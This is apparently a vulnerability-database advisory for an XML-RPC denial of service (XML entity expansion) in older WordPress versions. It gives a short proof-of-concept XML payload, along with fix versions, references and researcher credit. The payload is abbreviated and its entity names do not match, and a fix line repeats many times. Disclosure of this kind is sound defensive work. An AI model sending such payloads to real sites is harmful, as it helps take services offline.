WordPress 3.5-3.7.1 - XML-RPC Denial of Service



Proof of Concept
<?xml version=”1.0″?>
<!DOCTYPE DoS [
<!ENTITY a "xxxxxxxxxxxxxxxxx...">
]>
<DoS>&x;&x;&x;&x;&x;&x;&x;&x;&x;…</DoS>

Affects WordPresses

fixed in version 3.9.2
fixed in version 3.9.2
fixed in version 3.9.2
fixed in version 3.9.2
fixed in version 3.9.2
fixed in version 3.9.2
fixed in version 3.9.2
fixed in version 3.9.2

References

URL https://web.archive.org/web/20140825133704/http://www.breaksec.com/?p=6362
URL https://wordpress.org/news/2014/08/wordpress-3-9-2/
URL http://mashable.com/2014/08/06/wordpress-xml-blowup-dos/

Classification

Type DOS
CWE CWE-400

Miscellaneous

Original Researcher Nir Goldshlager
Views 6285
Verified Yes
WPVDB ID 7526

Timeline

Publicly Published 2014-08-27 (almost 6 years ago)
Added 2014-08-27 (almost 6 years ago)
Last Updated 2020-04-13 (about 2 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin